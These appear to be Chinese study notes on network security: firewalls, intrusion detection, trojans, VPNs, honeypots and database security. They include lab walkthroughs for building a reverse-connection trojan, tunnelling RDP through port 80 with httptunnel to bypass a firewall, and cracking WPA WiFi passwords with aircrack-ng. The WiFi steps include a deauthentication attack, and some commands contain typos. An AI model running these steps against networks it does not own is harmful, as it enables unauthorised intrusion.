3.信息安全之预防黑客攻击手段

1.防火墙技术(建筑术语和消防术语)

0. 设置一个大门,以防其他数据在其他地方进入(隔绝有害数据,是设备,开一个大门审核数据合法性 ,其他地方隔绝进入,防外网数据,绕开防火墙和内部攻击不管)保证数据完整性)
1. 原理 作用
   1.保护容易攻击的服务
   2.保护特殊站点(敏感信息)服务
   3.过滤非法用户,网络访问记录和统计(警察找犯人,有线索)
2. 防火墙分类 软件防火墙,硬件…,主机…,网络…,wins…,linux…
   技术上分类:
   1. 包过滤(检测数据包的传输层和网络层ip和目标ip)
   2. nat 代理(应用层)
   3. 监测(应用层 传输层 网络层 三层)
3. 规则配置(规则有先后次序)
4. 实验 天网防火墙软件 有端口规则 ip限制ping 还有日志
   不让其他机器访问我的网站 建立规则(软件可以移动规则到上面)

2.入侵检测(内部入侵,让防火墙防御,不能清除已经感染的病毒)

1. 入侵检测 IDS intrusion detection sys
   1. (检测判断阻断ip端口时间间隔 外网攻击,非法信息记录日志动态配置防火墙规则)
      (软件+硬件)实时保护
   2. 作用: 识别攻击手段,监控网络异常通讯(突然网络数据与之前数据不一样[大数据统计正常行为])
   3. 完善安全管理
      分类:
      1]基于主机HIDS,检查分析系统是否被攻击,然后报警
      2] NIDS网络的, 混杂模式,经过我的(与所有网络共享)数据包,进行检查 ,放在路由后
      问题: 1.误报率高 2.没有主动防御功能 秘书的例子…
2. IPS/IDP intrution prevention sys(ids和防火墙结合 有防御功能,立即响应切断连接) 多过滤器, 恶意包丢弃,怀疑的包放隔离区 360是IPS
   特征: 嵌入式运行(在路由后) 深入分析和控制 特征库 高性能

3.入侵防御技术

1. 集中式(使用网桥[一个网络连接另外一个网络]公网连接内网检查ip是否运行)
2. 分布式(多个ips[相互备份,混杂无ip,非混杂有ip]通知他的客户端来抗阻 黑客,有 一个center记录信息发送报警信息)

4.病毒和木马的区别

1. 病毒(分为蠕虫[独立运行,自动通过网络复制到网络传播])有自我复制传染性,潜伏期 附加在各种文件(半可执行)(可触发)(针对性 特定的计算机和操作系统)
2. 特洛伊木马(木马),古罗马打仗 特洛伊撤兵,放木马里面有20人潜伏让敌人打开城门带入里面,藏在程序里面,伪装很好,和系统文件名字一样.(不传染)(隐蔽性)(企业管理工具)
3. 反向(被攻击机主动连接攻击木马机)连接木马实验,飞鸽子软件
   配置服务程序—>本地ip
   安装选项—>提示成功关闭 打开删除安装文件 生成了server.exe就是木马

5.vpn连接两个局部网络, virtural private network 虚拟专有网络

1. 定义 穿过公用网络建立临时的,安全的连接
   (局域网)—加密–>公网----解密—>(局域网)

2. 分类 PPTP(最简单的) IPSEC L2TP(最安全的)

3. 功能 加密数据, 身份验证,范围控制,地址分配,更新秘钥

4. 优点 费用低(不用公网ip了) 支持常用的协议 ip地址安全(发请求,可以看到公网ip,但不能看到具体发送到的网络地址)
   nat转换 ,把局域网转公网
   dhcp 动态网络地址分配
   dns 谷歌8.8.8.8 国内114.114.114.114

5. 实验
   winserver2003 管理工具—>路由和远程范围创建和 配置和启动
   —>dhcp中继
   xp网络连接.创建连接 工作场所,虚拟网络 ip地址是vpn win2003的地址 输入2003的密码 菜单管理工具–>计算机管理—>本地用户和组右击administrator右击属性接入 -->允许访问

6.httptunnel技术(类似vpn)和蜜罐honeypot技术(有意设置一个靶机,试探敌方攻击方式,log下来,用来被攻陷的)主动防御 证据用于法律起诉

1. 蜜罐 产品型(实战,) 研究型(研究新攻击手段)
   把 su 改为 su xxx,将黑客(使用 su)引入蜜罐
2. 实验 80端口一定是开放的在http网站中,其他端口不开放,可是我想要连接远程桌面怎么办(3389)?
   httptunnel 通过工具在本地转换为远程桌面端口,访问
   A–3389端口(伪装)–80端口–firewall–80端口(默认打开)----访问3389端口–>B(被攻击)
   server: hts -F localhost:3389 #开放http80端口
   client: htc -F 6789 192.168.10.1:80 #把访问127.0.0.1转换为 服务器的80端口

7.破解wifi纯密码(字典) kali aircrack-ng抓取加密数据包和字典加密密文 对比得出原密码

 #挂载usb无线网卡 设置-->关闭所有启用网络连接,增加usb
    #kali 查看网卡
       airmon-ng
    #激活网卡,接收wifi信号
       airmon-ng start wlan0 #wlan0是网卡名字
       iwconfig #查在监听的网卡名
        #扫描wifi信号 PWR信号强度(小就强) CH频道号 AUTH加密方式,ESSID wifi名字
       airodump-ng wlan0mon 
       #手机连接wifi
    #抓包
    airodump-ng --bssid   9C:XXXX -c 11 -w WIFI wlan0mon  #写bassid和频道11放到WIFI这个文件
   #开了另外kali窗口攻击到抓包窗口出现WPA handshake
        airplay-ng -0 1 -a xxx攻击手机的mac -c xxxwifimac  -0 1 #攻击一次
   #破解上面语句生成的文件 WIFI*.cap
        aircrack-ng-w dict.txt WIFI*.cap #dict.txt是破解的字典

8.数据库系统安全技术(断电,…导致数据丢失,输入后就被获取,存入后没有意义)

1. 账号设置和密码弱(用默认的…)
2. 缺乏角色分离(数据库管理员使用的权限大,没有分职责的角色,权限要细分)
3. 缺乏审计跟踪(日志被关闭,为了省空间和性能)
4. 未利用数据库安全特征(只有客户端的安全,忽略直接用jdbc连接的安全问题)

9.怎么保证数据库安全?

1. 保证数据库完整性(物理[机器],逻辑[操作上,操作一个字段不影响整个表,直接删除掉…])
2. 保密性 权限控制 用户认证 审计跟踪(log) 数据加密
3. 数据备份
   无聊看的文章…https://www.cnblogs.com/Alickx/p/15318106.html

10.SQLmap进行sql注入(自动)支持多种数据库)

#kali增加火狐插件 add-ons -->temper data 得到cookie 打开sql注入功能